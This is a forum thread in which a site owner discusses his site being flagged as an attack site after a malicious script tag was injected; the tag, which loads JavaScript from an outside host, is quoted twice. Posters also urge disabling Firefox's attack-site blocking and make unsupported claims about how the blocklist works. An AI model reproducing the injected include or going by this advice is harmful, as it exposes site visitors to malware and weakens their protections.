How long does GOOGLE Take

Collapse
X

• Filter
  • Time
  • Show
Clear All

• How long does GOOGLE Take

I just submitted my web site to GOOGLE for a Malware review.
    My site got some bad script:
    <script type="text/javascript" src="http://kollinsoy.skyefen
    ton.com:8080/Scrolling.js"></script>
    Now the whole site is down and my visitors get the ugly page when they visit www.progresslanguage.com.
    Anyways, if anyone knows how long GOOGLE takes in getting back to the requester, I appreciate it.
    I am not sure what my account ID is, but will give it if asked.
    Thank you
    John

Re: How long does GOOGLE Take

WOW! From the time I last posted this, I had sent in my request for reconsideration and just got an email from a customer that my new web site looks good!
    HUH!
    I typed in my address and lo and behold my site address is back. That has to be a record! I was expecting weeks; even months!
    One thing I noticed though, is that Internet Explorer, Opera, Safari have no problems with this. Firefox still shows my site with the original GOOGLE attack page. I went into Firefox options, security, and unchecked "block reported attack sites" and now it works okay.
    I just hope this default setting does not keep my customers from viewing my page.
    I will send Firefox support a question about that, and how long it takes for them to not see my address as an attack site.
    Anyways, I hope this info helps.

Comment

I still see the attack page but if you say it's OK then it's OK.

The culprit seems to be

Doable Personal Finance

Comment

Well, you could be right, in that this is a first for me. Maybe I am being a bit presumptuous. Which search engine are you using; Firefox? If so, you'll have to go to options > security, and un-check the "block reported attack sites" box. [Edit]I also found this at http://forums.wittysparks.com/topic/...ox-web-browser
        It appears that there is a bit of a problem with Firefox maintaining its "attack site" settings even after the site has been cleaned up. I am going to get tot he bottom of this.

As I said, this is a first, but a GOOGLE search on the subject tells me that the average time is a day or two for this to get cleared up, as long as the request for reconsideration is performed correctly, and the offending web site has been cleaned up satisfactorily.

I will keep my fingers crossed and continue to monitor the situation very closely.

I believe that the offense occurred from the HTML codes from the several ad-on items I had used; the script being noted in my OP. Admittedly I did not get the time to go through each of my prior 34 pages of HTML code and try to find the proverbial needle. I simply deleted everything and I am going to start over and really be conscious of my web site content.

Comment

OK; I hit the nail on the head.

Apparently Firefox and GOOGLE have ganged up to censor web sites that become the innocent victim of any malicious coding and get a legitimate "Attack Site" quarantine.

What this thread is talking about is that once it happens to your web site, no one using Firefox can access your site unless they have enough computer savvy to override it, or are trusting enough to click on the "ignore" button that is intentionally(?) put in an inconspicuous spot in the lower L/H corner of this warning page.

Maybe the mods at BV and VH could help out with some ideas for customers who fall prey to this. The article even talks about a boycott of Firefox for using a code that is activated into Firefox 3 or higher when this happens

Article
          Certain pages on this site lead to a &#8220;reported attack site&#8221; warning for Firefox 3 users which is apparently a feature built into Firefox 3 and provided by Google. This is actually makin&#8230;

How to get rid of the code

This really has me steamed.

Comment

You should know where in your webpages you placed the following script:

"My site got some bad script:
            <script type="text/javascript" src="http://kollinsoy.skyefen
            ton.com:8080/Scrolling.js"
            ></script>"

Goto your cPanel or use your FTP, locate it and remove it from your webpage or pages.
            www.siapamoyanganda.com/
            Malaysian Family Tree Website From the
            State of Johor.

HAPPY ARE THOSE WHO DREAM DREAMS AND ARE READY TO PAY THE PRICE TO MAKE THEM COME TRUE.

Comment

Hi John,

You are right about FireFox. I had "block reported attack sites" checked.

I unchecked it and then clicked on your site link.

But I had to recheck "block reported attack sites".

If you let it stay unchecked, wouldn't that expose you
              to the "Real attack" when FireFox encounters one?

I would go to the source of the problem and if it happens to be
              that the attack is coming from external code or page - which is often the
              case - then if it is not extremely important to my site, I would
              just remove the code rather than be exposed to the "legitimate attack".
              Doable Personal Finance

Comment

Originally posted by wysiwyg4 View Post
                Hi John,

You are right about FireFox. I had "block reported attack sites" checked.

I unchecked it and then clicked on your site link.

But I had to recheck "block reported attack sites".

"If you let it stay unchecked, wouldn't that expose you
                to the "Real attack" when FireFox encounters one?
                "

I would go to the source of the problem and if it happens to be
                that the attack is coming from external code or page - which is often the
                case - then if it is not extremely important to my site, I would
                just remove the code rather than be exposed to the "legitimate attack".
                Hello wysiwyg4. After reading up on how Firefox uses this method to automatically block web sites, I am in complete disagreement with it. What "Real attack" are we worried about that a Kaspersky or AVG, etc. cannot handle? There are many ways for a responsible user to protect and secure their computers. I believe that when big boys like GOOGLE and Firefox start deciding what they think is good and bad, then we begin to lose our freedoms.

Not only that, wysiwyg4, but it is a lot like a credit reporting agency; once you get tainted by them, it becomes almost impossible to correct and get your reputation back; the chief problem being with their lethargic responses and system overrides. And, how many users know how to go into their search engine windows (in the tools and options, etc.) and even have the idea to disengage all these contentious guards?

My Kaspersky will not let anything attack my computer (so far) without first alerting me. There is even Sandboxie, where you can quarantine and open the item and see if it is infected. The point being; there are many tools for us to use. We do not need Firefox and GOOGLE to dictate to us if we are good or bad little boys or girls and punish us even after we have corrected our mistakes.

I am losing money, because anyone who had looked at my web site when the page was showing Firefox's "Malicious Attack" page will have their cache backed up and the code installed in their Firefox folder and will never be able to open my page again unless they know how to override this.

The statistics say that the average wait time for an Internet surfer is 10 seconds for a page to load, or for the information to make them stay or go. Firefox is not only giving me a False Positive for being a malicious web site, but it has designed a warning screen to make people think the worst about me, my product, and my intentions. There should be a law to protect users from this kind of "slander/libel" so that the offending false positive is removed just as quickly as it is placed on a web site.

But the problem remains; if you go to C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\ieqtyuka.default and look in that folder, you will find a file named "urlclassifier3.sqlite", which blocks innocent and classified safe web sites.
                This, my friend is wrong!

zuriatman, thanks for the heads up! I have already removed all my pages and have stored them in a folder. Your method sounds easy, but I am not aware of using it for its accuracy. Will check it out though definitely. Right now my priority is getting my site back up and getting Firefox to remove its false accusation about my web site and scaring away my customers with this cr@p. That really steams me a lot because they get to do this and can take their time with all their corporate excuses about how long it will be before they remove the libelous warning page. 'just my opinion about that.

Comment

John,

Thank you for going through all of the time to do the research on this topic.

I feel the same way you do. We had an IP address from China add a bad script to our page and were flagged with the same Firefox warning. We immediately changed all of our passwords, and took care of the issue. However, everyone who used Firefox to access our site during that time period continually receives the error message...still. Also, many sites that scan websites now have us listed as suspicious, and we have no recourse for making those warnings go away.

They should be just as quick to remove the block as they are to place it on your site.

This website is our main source of income and I am beginning to feel that if someone was really intent on harming American infrastructure, that it will be a cyber attack. This ordeal was absolutely paralyzing to my company and income.

Comment

Hey! Wow! Good morning (Thailand time)

'Just got out of the sack and made myself a cup of joe; put out some kibble for Buddy, my pet pug, and sat down at the 'puter and found this.

Living in Thailand has made me have to reconfigure my way of managing my thought processes. Realizing that I am a grain of sand on a beach is a beginner.

Basically I am just along for the ride on this Internet thingy.Still, it is wise to keep informed, because living in the dark can be nerve-wracking. Another thing you, about cyber attacks, made me chuckle, because here in the Land of $miles, the whole Internet concept in general is not what you are used to in, say, the USA.

It is a funny thing to try to do a GOOGLE search on things of a serious and innocuous nature, and have the Thai government block it. It is even more funny when that search, or page, is a page fom their own government website.

Anyways, I do not think the Firefox and IE problems of censoring, and mollycoddling their users is going to go away anytime too soon.

As far as my business is concerned, I will simply keep an eye on my pages on the net, and use GOOGLE to diagnose anything that comes up). GOOGLE seems to do a pretty good job of alerting me over anything funky.

On reflection, I believe my problem came from placing an add-on into my pages from a rinky dinky site. It apparently had some sort of malicious script, and it somehow put me at odds with GOOGLE and Firefox. What I don't get, is the timing. It had been there for some time before the alarms went off. Hmmm! Perhaps the spiders had overlooked it in the past and on that one particular "crawl" of my pages they finally came upon it.

Who knows?

Anyways, have a good day, and thanks for your response.

John.

Comment

Have encountered a similar problem and so happy to find lots of useful answers here.
                      &#24744;&#24050;&#25104;&#21151;&#23433;&#35013;LNMP&#19968;&#38190;&#23433;&#35013;&#21253;&#65281;

Comment

Working...
                      X